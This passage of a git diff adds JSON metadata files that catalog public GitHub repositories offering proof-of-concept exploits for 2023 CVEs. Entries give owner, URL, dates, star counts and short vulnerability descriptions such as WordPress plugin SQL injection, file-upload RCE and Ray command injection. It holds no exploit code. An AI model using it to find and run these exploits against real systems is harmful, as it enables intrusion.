+ "pushed_at": "2024-02-05T10:57:32Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 714734993,
+ "name": "CVE-2023-5360",
+ "full_name": "Pushkarup\/CVE-2023-5360",
+ "owner": {
+ "login": "Pushkarup",
+ "id": 148672587,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148672587?v=4",
+ "html_url": "https:\/\/github.com\/Pushkarup"
+ },
+ "html_url": "https:\/\/github.com\/Pushkarup\/CVE-2023-5360",
+ "description": "The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE.",
+ "fork": false,
+ "created_at": "2023-11-05T18:02:59Z",
+ "updated_at": "2024-01-22T07:53:10Z",
+ "pushed_at": "2023-11-05T18:40:11Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 718129350,
+ "name": "CVE-2023-5360",
+ "full_name": "1337r0j4n\/CVE-2023-5360",
+ "owner": {
+ "login": "1337r0j4n",
+ "id": 84887432,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84887432?v=4",
+ "html_url": "https:\/\/github.com\/1337r0j4n"
+ },
+ "html_url": "https:\/\/github.com\/1337r0j4n\/CVE-2023-5360",
+ "description": "CVE-2023-5360 Exploit\/POC",
+ "fork": false,
+ "created_at": "2023-11-13T12:51:34Z",
+ "updated_at": "2024-05-02T10:58:26Z",
+ "pushed_at": "2023-11-21T03:56:11Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-5360"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 736211346,
+ "name": "CVE-2023-5360-PoC",
+ "full_name": "angkerithhack001\/CVE-2023-5360-PoC",
+ "owner": {
+ "login": "angkerithhack001",
+ "id": 142613644,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142613644?v=4",
+ "html_url": "https:\/\/github.com\/angkerithhack001"
+ },
+ "html_url": "https:\/\/github.com\/angkerithhack001\/CVE-2023-5360-PoC",
+ "description": "CVE-2023-5360 EXPLOIT ",
+ "fork": false,
+ "created_at": "2023-12-27T09:32:05Z",
+ "updated_at": "2023-12-27T09:33:00Z",
+ "pushed_at": "2023-12-27T09:32:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5412.json b/2023/CVE-2023-5412.json
new file mode 100644
index 0000000000..32f63dc75c
--- /dev/null
+++ b/2023/CVE-2023-5412.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 712341472,
+ "name": "CVE-2023-5412",
+ "full_name": "RandomRobbieBF\/CVE-2023-5412",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-5412",
+ "description": "Image horizontal reel scroll slideshow <= 13.2 - Authenticated (Subscriber+) SQL Injection via Shortcode",
+ "fork": false,
+ "created_at": "2023-10-31T09:26:21Z",
+ "updated_at": "2023-12-04T17:45:32Z",
+ "pushed_at": "2023-10-31T09:32:33Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5521.json b/2023/CVE-2023-5521.json
new file mode 100644
index 0000000000..f7e71293a2
--- /dev/null
+++ b/2023/CVE-2023-5521.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 703526370,
+ "name": "CVE-2023-5521",
+ "full_name": "Ylarod\/CVE-2023-5521",
+ "owner": {
+ "login": "Ylarod",
+ "id": 30978685,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30978685?v=4",
+ "html_url": "https:\/\/github.com\/Ylarod"
+ },
+ "html_url": "https:\/\/github.com\/Ylarod\/CVE-2023-5521",
+ "description": "Root takeover via signature spoofing in KernelSU",
+ "fork": false,
+ "created_at": "2023-10-11T12:08:31Z",
+ "updated_at": "2024-06-13T14:15:05Z",
+ "pushed_at": "2023-10-11T12:34:37Z",
+ "stargazers_count": 15,
+ "watchers_count": 15,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 15,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5538.json b/2023/CVE-2023-5538.json
new file mode 100644
index 0000000000..a995e5ca27
--- /dev/null
+++ b/2023/CVE-2023-5538.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 703812630,
+ "name": "MpOperationLogs",
+ "full_name": "juweihuitao\/MpOperationLogs",
+ "owner": {
+ "login": "juweihuitao",
+ "id": 110007292,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110007292?v=4",
+ "html_url": "https:\/\/github.com\/juweihuitao"
+ },
+ "html_url": "https:\/\/github.com\/juweihuitao\/MpOperationLogs",
+ "description": "CVE-2023-5538 - MpOperationLogs <= 1.0.1 - 未经身份验证的存储跨站点脚本",
+ "fork": false,
+ "created_at": "2023-10-12T01:15:09Z",
+ "updated_at": "2023-10-12T01:15:09Z",
+ "pushed_at": "2023-10-12T01:49:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5539.json b/2023/CVE-2023-5539.json
new file mode 100644
index 0000000000..ae9a3f0465
--- /dev/null
+++ b/2023/CVE-2023-5539.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 706569887,
+ "name": "CVE-2023-5539",
+ "full_name": "cli-ish\/CVE-2023-5539",
+ "owner": {
+ "login": "cli-ish",
+ "id": 22986332,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22986332?v=4",
+ "html_url": "https:\/\/github.com\/cli-ish"
+ },
+ "html_url": "https:\/\/github.com\/cli-ish\/CVE-2023-5539",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-18T07:58:25Z",
+ "updated_at": "2023-10-18T07:58:25Z",
+ "pushed_at": "2023-10-18T07:58:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5540.json b/2023/CVE-2023-5540.json
new file mode 100644
index 0000000000..95d4dc7c85
--- /dev/null
+++ b/2023/CVE-2023-5540.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 706569939,
+ "name": "CVE-2023-5540",
+ "full_name": "cli-ish\/CVE-2023-5540",
+ "owner": {
+ "login": "cli-ish",
+ "id": 22986332,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22986332?v=4",
+ "html_url": "https:\/\/github.com\/cli-ish"
+ },
+ "html_url": "https:\/\/github.com\/cli-ish\/CVE-2023-5540",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-18T07:58:33Z",
+ "updated_at": "2023-10-18T07:58:33Z",
+ "pushed_at": "2023-10-18T07:58:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5546.json b/2023/CVE-2023-5546.json
new file mode 100644
index 0000000000..bac77f7689
--- /dev/null
+++ b/2023/CVE-2023-5546.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 681157074,
+ "name": "CVE-2023-5546",
+ "full_name": "obelia01\/CVE-2023-5546",
+ "owner": {
+ "login": "obelia01",
+ "id": 82713832,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82713832?v=4",
+ "html_url": "https:\/\/github.com\/obelia01"
+ },
+ "html_url": "https:\/\/github.com\/obelia01\/CVE-2023-5546",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-21T11:50:01Z",
+ "updated_at": "2023-08-21T11:50:02Z",
+ "pushed_at": "2023-08-21T11:50:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5561.json b/2023/CVE-2023-5561.json
new file mode 100644
index 0000000000..a24597de5d
--- /dev/null
+++ b/2023/CVE-2023-5561.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 731244611,
+ "name": "CVE-2023-5561-PoC",
+ "full_name": "pog007\/CVE-2023-5561-PoC",
+ "owner": {
+ "login": "pog007",
+ "id": 124298592,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124298592?v=4",
+ "html_url": "https:\/\/github.com\/pog007"
+ },
+ "html_url": "https:\/\/github.com\/pog007\/CVE-2023-5561-PoC",
+ "description": "WordPress does not properly restrict which user fields are searchable via the REST API, allowing unauthenticated attackers to discern the email addresses of users who have published public posts on an affected website via an Oracle style attack",
+ "fork": false,
+ "created_at": "2023-12-13T16:43:18Z",
+ "updated_at": "2024-05-02T03:13:51Z",
+ "pushed_at": "2023-12-13T16:47:37Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5717.json b/2023/CVE-2023-5717.json
new file mode 100644
index 0000000000..419d3cee7b
--- /dev/null
+++ b/2023/CVE-2023-5717.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 747097463,
+ "name": "CVE-2023-5717",
+ "full_name": "uthrasri\/CVE-2023-5717",
+ "owner": {
+ "login": "uthrasri",
+ "id": 145666390,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4",
+ "html_url": "https:\/\/github.com\/uthrasri"
+ },
+ "html_url": "https:\/\/github.com\/uthrasri\/CVE-2023-5717",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-23T09:04:00Z",
+ "updated_at": "2024-01-23T09:07:21Z",
+ "pushed_at": "2024-01-23T09:08:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5720.json b/2023/CVE-2023-5720.json
new file mode 100644
index 0000000000..995605bbb0
--- /dev/null
+++ b/2023/CVE-2023-5720.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 786209592,
+ "name": "CVE-2023-5720-2",
+ "full_name": "miguelc49\/CVE-2023-5720-2",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-5720-2",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-13T18:45:31Z",
+ "updated_at": "2024-04-14T17:41:22Z",
+ "pushed_at": "2024-04-15T22:42:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786209609,
+ "name": "CVE-2023-5720-1",
+ "full_name": "miguelc49\/CVE-2023-5720-1",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-5720-1",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-13T18:45:35Z",
+ "updated_at": "2024-04-14T17:41:20Z",
+ "pushed_at": "2024-04-15T19:58:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786209627,
+ "name": "CVE-2023-5720-3",
+ "full_name": "miguelc49\/CVE-2023-5720-3",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-5720-3",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-13T18:45:39Z",
+ "updated_at": "2024-04-14T17:41:26Z",
+ "pushed_at": "2024-04-15T20:00:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5808.json b/2023/CVE-2023-5808.json
new file mode 100644
index 0000000000..176dadde54
--- /dev/null
+++ b/2023/CVE-2023-5808.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 732971718,
+ "name": "CVE-2023-5808",
+ "full_name": "Arszilla\/CVE-2023-5808",
+ "owner": {
+ "login": "Arszilla",
+ "id": 22989170,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22989170?v=4",
+ "html_url": "https:\/\/github.com\/Arszilla"
+ },
+ "html_url": "https:\/\/github.com\/Arszilla\/CVE-2023-5808",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-18T09:24:14Z",
+ "updated_at": "2023-12-18T09:24:20Z",
+ "pushed_at": "2023-12-18T09:24:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5961.json b/2023/CVE-2023-5961.json
new file mode 100644
index 0000000000..523878d68e
--- /dev/null
+++ b/2023/CVE-2023-5961.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 750906260,
+ "name": "CVE-2023-5961",
+ "full_name": "HadessCS\/CVE-2023-5961",
+ "owner": {
+ "login": "HadessCS",
+ "id": 102136070,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102136070?v=4",
+ "html_url": "https:\/\/github.com\/HadessCS"
+ },
+ "html_url": "https:\/\/github.com\/HadessCS\/CVE-2023-5961",
+ "description": "moxa ioLogik E1212",
+ "fork": false,
+ "created_at": "2024-01-31T15:00:16Z",
+ "updated_at": "2024-02-27T15:19:44Z",
+ "pushed_at": "2024-01-31T15:03:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6019.json b/2023/CVE-2023-6019.json
new file mode 100644
index 0000000000..bc3efaaf0e
--- /dev/null
+++ b/2023/CVE-2023-6019.json
@@ -0,0 +1,152 @@
+[
+ {
+ "id": 784652268,
+ "name": "CVE-2023-6019",
+ "full_name": "FireWolfWang\/CVE-2023-6019",
+ "owner": {
+ "login": "FireWolfWang",
+ "id": 33483801,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33483801?v=4",
+ "html_url": "https:\/\/github.com\/FireWolfWang"
+ },
+ "html_url": "https:\/\/github.com\/FireWolfWang\/CVE-2023-6019",
+ "description": "Ray OS Command Injection RCE(Unauthorized)",
+ "fork": false,
+ "created_at": "2024-04-10T09:24:06Z",
+ "updated_at": "2024-04-11T13:50:19Z",
+ "pushed_at": "2024-04-10T09:28:08Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786209900,
+ "name": "CVE-2023-6019-2",
+ "full_name": "miguelc49\/CVE-2023-6019-2",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-6019-2",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-13T18:46:44Z",
+ "updated_at": "2024-04-14T17:41:33Z",
+ "pushed_at": "2024-04-14T17:41:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786209916,
+ "name": "CVE-2023-6019-1",
+ "full_name": "miguelc49\/CVE-2023-6019-1",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-6019-1",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-13T18:46:49Z",
+ "updated_at": "2024-04-14T17:41:29Z",
+ "pushed_at": "2024-04-14T17:41:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786353747,
+ "name": "CVE-2023-6019-3",
+ "full_name": "miguelc49\/CVE-2023-6019-3",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-6019-3",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-14T07:35:11Z",
+ "updated_at": "2024-04-14T17:41:39Z",
+ "pushed_at": "2024-04-14T17:41:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 789777022,
+ "name": "CVE-2023-6019",
+ "full_name": "Clydeston\/CVE-2023-6019",
+ "owner": {
+ "login": "Clydeston",
+ "id": 47860813,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47860813?v=4",
+ "html_url": "https:\/\/github.com\/Clydeston"
+ },
+ "html_url": "https:\/\/github.com\/Clydeston\/CVE-2023-6019",
+ "description": "Python POC for CVE-2023-6019 taken from https:\/\/huntr.com\/bounties\/d0290f3c-b302-4161-89f2-c13bb28b4cfe",
+ "fork": false,
+ "created_at": "2024-04-21T14:30:28Z",
+ "updated_at": "2024-06-10T16:37:07Z",
+ "pushed_at": "2024-04-21T14:32:45Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6036.json b/2023/CVE-2023-6036.json
new file mode 100644
index 0000000000..22121ebf56
--- /dev/null
+++ b/2023/CVE-2023-6036.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 750960186,
+ "name": "CVE-2023-6036",
+ "full_name": "pctripsesp\/CVE-2023-6036",
+ "owner": {
+ "login": "pctripsesp",
+ "id": 17095580,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17095580?v=4",
+ "html_url": "https:\/\/github.com\/pctripsesp"
+ },
+ "html_url": "https:\/\/github.com\/pctripsesp\/CVE-2023-6036",
+ "description": "POC about Web3 – Crypto wallet Login & NFT token gating < 3.0.0 - Authentication Bypass Wordpress plugin",
+ "fork": false,
+ "created_at": "2024-01-31T16:58:48Z",
+ "updated_at": "2024-02-01T14:21:59Z",
+ "pushed_at": "2024-01-31T17:42:42Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6063.json b/2023/CVE-2023-6063.json
new file mode 100644
index 0000000000..e9b8cc02ce
--- /dev/null
+++ b/2023/CVE-2023-6063.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 719146234,
+ "name": "CVE-2023-6063-PoC",
+ "full_name": "motikan2010\/CVE-2023-6063-PoC",
+ "owner": {
+ "login": "motikan2010",
+ "id": 3177297,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4",
+ "html_url": "https:\/\/github.com\/motikan2010"
+ },
+ "html_url": "https:\/\/github.com\/motikan2010\/CVE-2023-6063-PoC",
+ "description": "CVE-2023-6063 (WP Fastest Cache < 1.2.2 - UnAuth SQL Injection)",
+ "fork": false,
+ "created_at": "2023-11-15T14:53:03Z",
+ "updated_at": "2024-05-15T12:37:12Z",
+ "pushed_at": "2023-11-15T14:53:48Z",
+ "stargazers_count": 29,
+ "watchers_count": 29,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 29,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 719663902,
+ "name": "CVE-2023-6063-PoC",
+ "full_name": "hackersroot\/CVE-2023-6063-PoC",
+ "owner": {
+ "login": "hackersroot",
+ "id": 128667885,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128667885?v=4",
+ "html_url": "https:\/\/github.com\/hackersroot"
+ },
+ "html_url": "https:\/\/github.com\/hackersroot\/CVE-2023-6063-PoC",
+ "description": "Exploiting SQL Injection Vulnerability in WP Fastest Cache (CVE-2023-6063)",
+ "fork": false,
+ "created_at": "2023-11-16T16:36:44Z",
+ "updated_at": "2023-11-16T16:36:45Z",
+ "pushed_at": "2023-11-16T16:41:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 719689698,
+ "name": "CVE-2023-6063",
+ "full_name": "thesafdari\/CVE-2023-6063",
+ "owner": {
+ "login": "thesafdari",
+ "id": 122823051,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122823051?v=4",
+ "html_url": "https:\/\/github.com\/thesafdari"
+ },
+ "html_url": "https:\/\/github.com\/thesafdari\/CVE-2023-6063",
+ "description": "CVE-2023-6063 (WP Fastest Cache < 1.2.2 - UnAuth SQL Injection)",
+ "fork": false,
+ "created_at": "2023-11-16T17:41:59Z",
+ "updated_at": "2024-05-29T16:36:38Z",
+ "pushed_at": "2023-11-16T17:44:39Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6241.json b/2023/CVE-2023-6241.json
new file mode 100644
index 0000000000..2651cf3f1e
--- /dev/null
+++ b/2023/CVE-2023-6241.json
@@ -0,0 +1,41 @@
+[
+ {
+ "id": 794812900,
+ "name": "CVE-2023-6241",
+ "full_name": "s1204IT\/CVE-2023-6241",
+ "owner": {
+ "login": "s1204IT",
+ "id": 52069677,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52069677?v=4",
+ "html_url": "https:\/\/github.com\/s1204IT"
+ },
+ "html_url": "https:\/\/github.com\/s1204IT\/CVE-2023-6241",
+ "description": "CVE-2023-6241 for Pixel 8",
+ "fork": false,
+ "created_at": "2024-05-02T02:17:31Z",
+ "updated_at": "2024-06-22T04:44:15Z",
+ "pushed_at": "2024-06-21T08:24:09Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "android",
+ "android-14",
+ "arm",
+ "google",
+ "mali",
+ "pixel",
+ "pixel8",
+ "poe"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6246.json b/2023/CVE-2023-6246.json
new file mode 100644
index 0000000000..0f76df39fd
--- /dev/null
+++ b/2023/CVE-2023-6246.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 766195734,
+ "name": "CVE-2023-6246",
+ "full_name": "elpe-pinillo\/CVE-2023-6246",
+ "owner": {
+ "login": "elpe-pinillo",
+ "id": 30589235,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30589235?v=4",
+ "html_url": "https:\/\/github.com\/elpe-pinillo"
+ },
+ "html_url": "https:\/\/github.com\/elpe-pinillo\/CVE-2023-6246",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-02T15:45:52Z",
+ "updated_at": "2024-05-31T01:55:50Z",
+ "pushed_at": "2024-03-06T20:12:50Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
